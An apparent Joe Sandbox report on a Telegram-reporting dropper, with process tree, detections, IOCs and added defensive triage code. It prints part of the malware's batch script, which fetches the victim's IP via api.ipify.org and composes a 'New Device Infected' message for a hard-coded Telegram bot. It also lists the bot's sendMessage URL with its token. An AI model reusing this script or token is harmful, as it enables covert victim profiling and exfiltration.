Discovery: System Time Discovery [1]; File and Directory Discovery [3]; System Information Discovery [44]; Security Software Discovery [54]; Process Discovery [2]; Virtualization/Sandbox Evasion [251]; Application Window Discovery [1]; System Network Configuration Discovery [1]
Lateral Movement: none badged
Collection: Archive Collected Data [1]; Clipboard Data [3]
Command and Control: Web Service [1]; Ingress Tool Transfer [1]; Encrypted Channel [11]; Non-Application Layer Protocol [3]; Application Layer Protocol [14]
Exfiltration: none badged
Impact: none badged
Behavior Graph ID: 1579562, Sample: setup.exe, Startdate: 23/12/2024, Architecture: WINDOWS, Score: 100

Sample-level observations:
  - Contacted hosts: api.telegram.org, api.ipify.org
  - Signatures: Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for dropped file; 11 other signatures
  - Uses the Telegram API (likely for C&C communication), attached to api.telegram.org

Process tree (numbers in brackets are graph node IDs, not PIDs):
  setup.exe [10]
    dropped: C:\Users\user\AppData\Local\Temp\tg.exe (PE32); C:\Users\user\AppData\Local\...\svchost.exe (PE32+); C:\Users\user\AppData\Local\Temp\client.exe (PE32)
    signatures: Encrypted powershell cmdline option found; Drops PE files with benign system names
    svchost.exe [19]
      dropped: C:\ProgramData\Microsoft\...\svchost.exe (PE32)
      signatures: Machine Learning detection for dropped file; Drops PE files to the startup folder; Drops PE files with benign system names
      svchost.exe [29]
        dropped: C:\ProgramData\svchost\svchost.exe (PE32)
        signatures: Hides threads from debuggers
        svchost.exe [39]
          signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Found evasive API chain (may stop execution after checking mutex); 3 other signatures
    tg.exe [23]
      dropped: C:\Users\user\AppData\Local\Temp\...\1BBC.bat (ASCII)
      signatures: Multi AV Scanner detection for dropped file; Detected unpacking (overwrites its own PE header)
      cmd.exe [33]
        cmd.exe [42]
          powershell.exe [51]
            network: api.ipify.org 104.26.13.205:443 (CLOUDFLARENETUS, United States), local port 49730
        cmd.exe [44]
          powershell.exe [54]
        cmd.exe [46]
          powershell.exe [56]
        4 other processes [48]
          powershell.exe [58]
          powershell.exe [60]
          network: api.telegram.org 149.154.167.220:443 (TELEGRAMRU, United Kingdom), local port 49734
    powershell.exe [25]
      signatures: Loading BitLocker PowerShell Module
      WmiPrvSE.exe [35]
      conhost.exe [37]
    client.exe [27]
  svchost.exe [14]
    signatures: Hides threads from debuggers
  svchost.exe [16]
    network: 127.0.0.1

Antivirus results for the submitted sample (Source | Detection | Scanner | Label)
setup.exe | 61% | Virustotal |
setup.exe | 63% | ReversingLabs | Win32.Dropper.Dapato
setup.exe | 100% | Avira | HEUR/AGEN.1355885

Antivirus results for dropped files (Source | Detection | Scanner | Label)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe | 100% | Avira | TR/Crypt.XPACK.Gen
C:\ProgramData\svchost\svchost.exe | 100% | Avira | TR/Crypt.XPACK.Gen
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\tg.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\svchost.exe | 100% | Joe Sandbox ML |
C:\ProgramData\svchost\svchost.exe | 100% | Joe Sandbox ML |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe | 63% | ReversingLabs | Win32.Trojan.MintSneaky
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe | 69% | Virustotal |
C:\ProgramData\svchost\svchost.exe | 63% | ReversingLabs | Win32.Trojan.MintSneaky
C:\ProgramData\svchost\svchost.exe | 69% | Virustotal |
C:\Users\user\AppData\Local\Temp\tg.exe | 24% | ReversingLabs | Win32.Trojan.Generic

No Antivirus matches
Contacted domains (Name | IP | Active | Malicious | Reputation)
api.ipify.org | 104.26.13.205 | true | false | high
api.telegram.org | 149.154.167.220 | true | false | high

Contacted URLs (Name | Malicious | Reputation)
https://api.telegram.org/bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage | false | high
https://api.ipify.org/?format=text | false | high
Contacted public IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.26.13.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false

Private or local IPs
127.0.0.1
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1579562
                Start date and time:2024-12-23 01:04:13 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 10m 17s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:28
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:setup.exe
                Detection:MAL
                Classification:mal100.troj.adwa.spyw.evad.winEXE@42/28@2/3
                EGA Information:
                • Successful, ratio: 87.5%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 205
                • Number of non-executed functions: 205
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded IPs from analysis (whitelisted): 23.218.208.109, 4.245.163.56, 13.107.246.63
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target powershell.exe, PID 1396 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
00:05:09 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run svchost "C:\ProgramData\svchost\svchost.exe" --run
19:05:09 | API Interceptor | 86x Sleep call for process: powershell.exe modified
19:05:17 | API Interceptor | 3252972x Sleep call for process: svchost.exe modified
19:05:53 | API Interceptor | 7257216x Sleep call for process: tg.exe modified
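The autostart entry above, the svchost.exe copies dropped into ProgramData and the all-users Startup folder, and the api.telegram.org / api.ipify.org lookups are exactly what the Sigma rules in the signature list ("Files With System Process Name In Unsuspected Locations", "System File Execution Location Anomaly", "Check external IP via Powershell") key on. The triage helper below is an added example, not part of the Joe Sandbox report or of the sample: it encodes those checks plus an exact hash match and runs them over constructed Sysmon-style event records. The event field names (type, image, key, data, target, query) and the rule names are assumptions; the hashes and hostnames are copied from this report.

```python
"""
Triage helper for the persistence and masquerading indicators in the report:
a system-binary name running outside System32, a Run-key autostart pointing at
it, a PE dropped into the all-users Startup folder, a known dropped-file hash,
and DNS lookups of the reported hosts. Added example, not report code.
Event field names are assumptions modelled on Sysmon event fields.
"""
import ntpath

# Hashes and hosts copied from the report.
IOC_SHA256 = {
    "5f82e21c783da05e616618ac9aca0dc5b240bcb3dbf15c4d2d07d19fe57bc056": "setup.exe (submitted sample)",
    "ce36ab4681bd40bd28337984b10eaa6b1248cca3a84e52bf6a03d6bf1ddc030d": "svchost.exe dropped to ProgramData/Startup",
}
IOC_DOMAINS = {
    "api.telegram.org": "Telegram Bot API (C2 channel in the report)",
    "api.ipify.org": "external IP lookup seen in the report",
}

# Binaries that only legitimately execute from the Windows system directories.
SYSTEM_PROCESS_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe",
                        "services.exe", "smss.exe", "wininit.exe"}
ALLOWED_SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
STARTUP_FOLDER = "\\microsoft\\windows\\start menu\\programs\\startup\\"
RUN_KEY = "\\software\\microsoft\\windows\\currentversion\\run"
PE_EXTENSIONS = (".exe", ".dll", ".scr", ".com")


def image_from_command(cmd: str) -> str:
    """Extract the executable path from a Run-key command line such as
    '"C:\\ProgramData\\svchost\\svchost.exe" --run' (quoted or bare)."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    return cmd.split()[0] if cmd else ""


def system_name_outside_system32(image: str) -> bool:
    """System File Execution Location Anomaly: a system binary name whose
    path is not under System32 or SysWOW64 (case-insensitive)."""
    path = image.lower()
    return (ntpath.basename(path) in SYSTEM_PROCESS_NAMES
            and not path.startswith(ALLOWED_SYSTEM_DIRS))


def triage(events):
    """Return a list of (rule, detail) findings for an iterable of event dicts."""
    findings = []
    for ev in events:
        kind = ev.get("type")
        if kind == "process_create":
            if system_name_outside_system32(ev["image"]):
                findings.append(("system_process_name_in_unexpected_location", ev["image"]))
            digest = ev.get("sha256", "").lower()
            if digest in IOC_SHA256:
                findings.append(("known_bad_hash", IOC_SHA256[digest]))
        elif kind == "registry_set":
            # Sysmon puts the value name at the end of the key path, so a
            # substring match covers Run\<name> and RunOnce\<name>.
            if RUN_KEY in ev["key"].lower():
                if system_name_outside_system32(image_from_command(ev["data"])):
                    findings.append(("run_key_autostart_masquerading_system_binary", ev["data"]))
        elif kind == "file_create":
            target = ev["target"].lower()
            if STARTUP_FOLDER in target and target.endswith(PE_EXTENSIONS):
                findings.append(("pe_dropped_in_startup_folder", ev["target"]))
        elif kind == "dns_query":
            host = ev["query"].lower()
            if host in IOC_DOMAINS:
                findings.append(("dns_to_reported_indicator", f"{host}: {IOC_DOMAINS[host]}"))
    return findings


# Constructed events mirroring the report's process tree; not real telemetry.
SAMPLE_EVENTS = [
    {"type": "process_create", "image": "C:\\Windows\\System32\\svchost.exe", "sha256": ""},
    {"type": "process_create", "image": "C:\\ProgramData\\svchost\\svchost.exe",
     "sha256": "CE36AB4681BD40BD28337984B10EAA6B1248CCA3A84E52BF6A03D6BF1DDC030D"},
    {"type": "registry_set",
     "key": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svchost",
     "data": "\"C:\\ProgramData\\svchost\\svchost.exe\" --run"},
    {"type": "file_create",
     "target": "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\svchost.exe"},
    {"type": "dns_query", "query": "api.telegram.org"},
    {"type": "dns_query", "query": "www.microsoft.com"},
]

if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_EVENTS):
        print(f"{rule}: {detail}")
```

Run as a script it prints five findings for the constructed events and nothing for the legitimate System32 svchost.exe or the microsoft.com lookup. On a real host, feed it records exported from Sysmon event IDs 1 (process create), 11 (file create), 13 (registry value set) and 22 (DNS query) after mapping their fields to the names used here. The hash match is exact and only fires on the two binaries named in this report; the path and Run-key checks are the generalisable part and also catch variants dropped under other user-writable directories.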
IP context (Match | Associated sample | Detection | Threat name | Context)
149.154.167.220 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc |
149.154.167.220 | user.exe | malicious | Unknown |
149.154.167.220 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig |
149.154.167.220 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig |
149.154.167.220 | 8v1GZ8v1LF.exe | malicious | Unknown |
149.154.167.220 | HX Design.exe | malicious | Python Stealer, Blank Grabber |
149.154.167.220 | file.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, XWorm |
149.154.167.220 | 2QaN4hOyJs.exe | malicious | XWorm |
149.154.167.220 | Invoice DHL - AWB 2024 E4001 - 0000731.exe | malicious | Snake Keylogger |
149.154.167.220 | c9toH15OT0.exe | malicious | Unknown |
104.26.13.205 | BiXS3FRoLe.exe | malicious | TrojanRansom | api.ipify.org/
104.26.13.205 | lEUy79aLAW.exe | malicious | TrojanRansom | api.ipify.org/
104.26.13.205 | Simple1.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | 2b7cu0KwZl.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | file.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | RDPWrap Tool | api.ipify.org/
104.26.13.205 | Prismifyr-Install.exe | malicious | Node Stealer | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | api.ipify.org/

Domain context (Match | Associated sample | Detection | Threat name | Context)
api.ipify.org | QUOTATION#008792.exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | c9toH15OT0.exe | malicious | Unknown | 104.26.12.205
api.ipify.org | https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a | malicious | HTMLPhisher | 172.67.74.152
api.ipify.org | billys.exe | malicious | Meduza Stealer | 172.67.74.152
api.ipify.org | ruppert.exe | malicious | CredGrabber, Meduza Stealer | 104.26.13.205
api.ipify.org | DHL_231437894819.bat.exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | 4089137200.exe | malicious | AgentTesla | 172.67.74.152
api.ipify.org | iviewers.dll | malicious | CredGrabber, Meduza Stealer | 104.26.12.205
api.ipify.org | script.ps1 | malicious | CredGrabber, Meduza Stealer | 104.26.12.205
api.ipify.org | script.hta | malicious | CredGrabber, Meduza Stealer | 104.26.12.205
api.telegram.org | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 149.154.167.220
api.telegram.org | user.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | 149.154.167.220
api.telegram.org | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | 149.154.167.220
api.telegram.org | 8v1GZ8v1LF.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | HX Design.exe | malicious | Python Stealer, Blank Grabber | 149.154.167.220
api.telegram.org | 2QaN4hOyJs.exe | malicious | XWorm | 149.154.167.220
api.telegram.org | Invoice DHL - AWB 2024 E4001 - 0000731.exe | malicious | Snake Keylogger | 149.154.167.220
api.telegram.org | c9toH15OT0.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | 9KEZfGRjyK.exe | malicious | Unknown | 149.154.167.220

ASN context (Match | Associated sample | Detection | Threat name | Context)
TELEGRAMRU | AmsterdamCryptoLTD.exe | malicious | LummaC, DarkComet, LummaC Stealer, Vidar | 149.154.167.99
TELEGRAMRU | GoldenContinent.exe | malicious | Vidar | 149.154.167.99
TELEGRAMRU | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 149.154.167.220
TELEGRAMRU | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 149.154.167.99
TELEGRAMRU | user.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | 149.154.167.220
TELEGRAMRU | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 149.154.167.99
TELEGRAMRU | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | 149.154.167.220
TELEGRAMRU | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 149.154.167.99
TELEGRAMRU | 8v1GZ8v1LF.exe | malicious | Unknown | 149.154.167.220
CLOUDFLARENETUS | AmsterdamCryptoLTD.exe | malicious | LummaC, DarkComet, LummaC Stealer, Vidar | 104.21.80.1
CLOUDFLARENETUS | WonderHack.exe | malicious | LummaC | 104.21.66.86
CLOUDFLARENETUS | installer.msi | malicious | Unknown | 172.67.164.25
CLOUDFLARENETUS | external.exe | malicious | LummaC | 104.21.19.35
CLOUDFLARENETUS | Loader.exe | malicious | RHADAMANTHYS | 172.64.41.3
CLOUDFLARENETUS | Launcher.exe | malicious | LummaC | 104.21.66.86
CLOUDFLARENETUS | Setup.exe | malicious | LummaC | 172.67.151.193
CLOUDFLARENETUS | Setup.exe | malicious | LummaC | 172.67.191.144
CLOUDFLARENETUS | Full_Ver_Setup.exe | malicious | LummaC | 104.21.63.229
CLOUDFLARENETUS | loligang.sh4.elf | malicious | Mirai | 162.158.254.178

JA3 fingerprint context (Match | Associated sample | Detection | Threat name | Context)
3b5074b1b5d032e5620f69f9f700ff0e | Loader.exe | malicious | RHADAMANTHYS | 149.154.167.220, 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | medicalanalysispro.exe | malicious | RHADAMANTHYS | 149.154.167.220, 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | winwidgetshp.mp4.hta | malicious | LummaC | 149.154.167.220, 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | Support.Client.exe | malicious | ScreenConnect Tool | 149.154.167.220, 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | NOTIFICATION_OF_DEPENDANTS_1.vbs | malicious | Unknown | 149.154.167.220, 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | NOTIFICATION_OF_DEPENDANTS.vbs | malicious | Unknown | 149.154.167.220, 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | HLMJbase.dll | malicious | Unknown | 149.154.167.220, 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | HLMJbase.dll | malicious | Unknown | 149.154.167.220, 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | swift-bootstrapper.exe | malicious | Unknown | 149.154.167.220, 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 149.154.167.220, 104.26.13.205

No context
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8192
                                    Entropy (8bit):0.363788168458258
                                    Encrypted:false
                                    SSDEEP:6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                    MD5:0E72F896C84F1457C62C0E20338FAC0D
                                    SHA1:9C071CC3D15E5BD8BF603391AE447202BD9F8537
                                    SHA-256:686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
                                    SHA-512:AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
                                    Malicious:false
                                    Preview:*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):1.3107386184942755
                                    Encrypted:false
                                    SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrf:KooCEYhgYEL0In
                                    MD5:951C6A0161E5037F7D8B292965F95CC4
                                    SHA1:20FAD3DDCCC208D88CA843B4BC4CE23BD5284E5D
                                    SHA-256:A03B0DCA6F93CED313DC76205394A6663507536B466AD8A3D4C47B12F89984F2
                                    SHA-512:7142129126ED14E0FC919EA2D62E696A65BF87B9022A83401F499F251B7175AC5CACF6F6F795FEBF82655A16DBC276D2F7B17615FE0A31240F3F9827B5DE8E79
                                    Malicious:false
                                    Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0xea210a0f, page size 16384, Windows version 10.0
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):0.42210399898945045
                                    Encrypted:false
                                    SSDEEP:1536:nSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:nazag03A2UrzJDO
                                    MD5:4DB7D318CD8CD7717AE5B3030A57163D
                                    SHA1:7093C48906D12EA6CC292564A9F08CFA97962E46
                                    SHA-256:98E186D1BEAF15B2A209AB96E943A195D9DA2402258A540B83553484A35733D5
                                    SHA-512:0EFB8F5C1F96BEEA7E1A24AE03126E1D8EFB53ABA2D91CA15F035994BC152C31F5F87373C58E9702DE7163A057B47F800EF78AB9DBC0B8F92DA9BB79CC490BC5
                                    Malicious:false
                                    Preview:.!..... .......Y.......X\...;...{......................n.%.....!....|.......|..h.#.....!....|..n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{..................................oH.f!....|...................m!....|...........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):16384
                                    Entropy (8bit):0.074089380346648
                                    Encrypted:false
                                    SSDEEP:3:ylllWetYeAgyky/FpXX6AylE0Ax8/illOE/tlnl+/rTc:ylbzPyLaAcE0Ax8epMP
                                    MD5:1DD32939798E0CD79CF1CCE4B59F7180
                                    SHA1:57280F6DA1CA4439D48645FC4F71BFC4198CA72A
                                    SHA-256:DB1FE5FDF4E437A1DDDBF47C3B3E734966B9293D4C92F8F86D0D724CD05D855E
                                    SHA-512:C362BBD0C2F3455AF791996289238D237AF78B2C2F2556D1A5262A290036CCB15D01490C4466793967C312AA8338E4C14CAD6EC4F6409DD2A6855CE5B8625241
                                    Malicious:false
                                    Preview:.B.l.....................................;...{.......|..!....|..........!....|..!....|..6W..!....|m..................m!....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\AppData\Local\Temp\svchost.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):187392
                                    Entropy (8bit):6.963700877666065
                                    Encrypted:false
                                    SSDEEP:3072:NUFRop3/6D5n1rDKFcweOp8mAt7Coo1p4JI0KnKDvxJvKV:qjPVDOcweOp8mOL2p4JI0iKv
                                    MD5:A3027B4F632E949EF06C151BD8787FAF
                                    SHA1:5609C029F9D7D184F55ED113051669B72622B98F
                                    SHA-256:CE36AB4681BD40BD28337984B10EAA6B1248CCA3A84E52BF6A03D6BF1DDC030D
                                    SHA-512:B92D0F5C613933AF203F62BB257C96DBAB84ABD0384E13DFDF97D21C108201089D91E744C8364ED02B3E5FA7EBEEF1762EDF7804832A8E9EA035159990840B2C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 63%
                                    • Antivirus: Virustotal, Detection: 69%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'...F..F..F.F.z..F...I..F...|..F...H..F..>a..F..>q..F..F.F...M..F......F.Rich.F.........PE..L...................................c.............@.................................s...........................................x...................................................................X...@............................................text.............................. ..`.rdata...O.......P..................@..@.data...............................`....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):187392
                                    Entropy (8bit):6.963700877666065
                                    Encrypted:false
                                    SSDEEP:3072:NUFRop3/6D5n1rDKFcweOp8mAt7Coo1p4JI0KnKDvxJvKV:qjPVDOcweOp8mOL2p4JI0iKv
                                    MD5:A3027B4F632E949EF06C151BD8787FAF
                                    SHA1:5609C029F9D7D184F55ED113051669B72622B98F
                                    SHA-256:CE36AB4681BD40BD28337984B10EAA6B1248CCA3A84E52BF6A03D6BF1DDC030D
                                    SHA-512:B92D0F5C613933AF203F62BB257C96DBAB84ABD0384E13DFDF97D21C108201089D91E744C8364ED02B3E5FA7EBEEF1762EDF7804832A8E9EA035159990840B2C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 63%
                                    • Antivirus: Virustotal, Detection: 69%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'...F..F..F.F.z..F...I..F...|..F...H..F..>a..F..>q..F..F.F...M..F......F.Rich.F.........PE..L...................................c.............@.................................s...........................................x...................................................................X...@............................................text.............................. ..`.rdata...O.......P..................@..@.data...............................`....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1588
                                    Entropy (8bit):5.614529068256494
                                    Encrypted:false
                                    SSDEEP:48:kSU4xymdajms4RIoUxqr9tK8NLyku9OjlZS5GhNg:9HxvJsIfeqr2KLyHOZZ4kNg
                                    MD5:55D7C5BA0B065434584BC30D66E5B9FE
                                    SHA1:CFCB5D905CE736C50849AC8E420AC11413FD382C
                                    SHA-256:AF7BAC94418A9CD5390ECC73DFAD3A479858F2D229424C5D2512C7EF76877B47
                                    SHA-512:ECA4CA396028F20CAF33E2C65FB49F6E2ADEC8A430310F6FE5F0DFA2582A48C4C7D0337860010CEED2D3D8DA816EB3D0F4A6A48F846C8F1DF7DF3DD16F7532C6
                                    Malicious:false
                                    Preview:@...e...........b...............................................@...............M6.]..O....PI.&........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                    Process:C:\Users\user\AppData\Local\Temp\tg.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1284
                                    Entropy (8bit):5.323297766564296
                                    Encrypted:false
                                    SSDEEP:24:QxiRbZbBiRqB3+QeL/7Amk7qaO7osBtHstuLMiv2Af+wPj:rbdBiEBut/7D+yok1s8LZv2A28
                                    MD5:D094D92CFDD4BA9B839122A175C59130
                                    SHA1:599DFD03AB835DA6C53D468E79405A369FBA8BC6
                                    SHA-256:DD3B2B5FB6ED84798054474779F953DFBB93359FB46B1B0C235F348904794751
                                    SHA-512:8088FBEF90F5EF5BF4948F6A41B74D26DBE5605FB0D540FE434D206CDB12B8AC9A8362CF550C4B5D73BFD99F07EC49AA8347BB8531ED8F557B999A549DE26F5D
                                    Malicious:true
                                    Preview:@shift /0..@echo off..:: Define Telegram bot details..set botToken=7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ..set chatId=6734985705....:: Get current date and time using PowerShell..for /f "delims=" %%i in ('powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"') do set currentDate=%%i....:: Get the public IP address..for /f "delims=" %%i in ('powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"') do set publicIp=%%i....:: Get local machine information (hostname, OS version, and architecture)..for /f "delims=" %%i in ('powershell -Command "$env:COMPUTERNAME"') do set hostname=%%i..for /f "delims=" %%i in ('powershell -Command "[System.Environment]::OSVersion"') do set os=%%i..for /f "delims=" %%i in ('powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"') do set architecture=%%i....:: Compose the message..set message= @New Device Infected!!!, > System Information: Date: %currentDate%, Hostname: %hostname%,
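The dropped batch file above is the part of the chain that actually talks to Telegram: it hard-codes a bot token and chat id, spawns PowerShell to learn the victim's public IP from api.ipify.org, hostname, OS version and bitness, and composes a "New Device Infected" message (the preview is cut off after the `set message=` line, so the call that sends it is not visible). The bot token and chat id are the most actionable indicators in this entry, because they are the operator's credentials for the Bot API rather than anything the malware generates per victim. The Python below is an added triage helper, not the malware's code and not part of the sandbox report: it re-expands the preview (Joe Sandbox shows the CRLF terminators as `..`) into a constructed sample, pulls every `set NAME=VALUE` assignment, matches anything shaped like a Telegram bot token, and lists the URLs the script reaches. The token pattern `<bot id>:<35 characters>` and the extra IP-lookup hosts beyond ipify are assumptions on my part; `api.telegram.org` is the Bot API host and is reported only because a token was found, since the preview does not show which API method the script calls.

```python
import re

# Constructed input: the visible head of the batch file dropped by tg.exe,
# transcribed from the report preview with ".." expanded back to CRLF.
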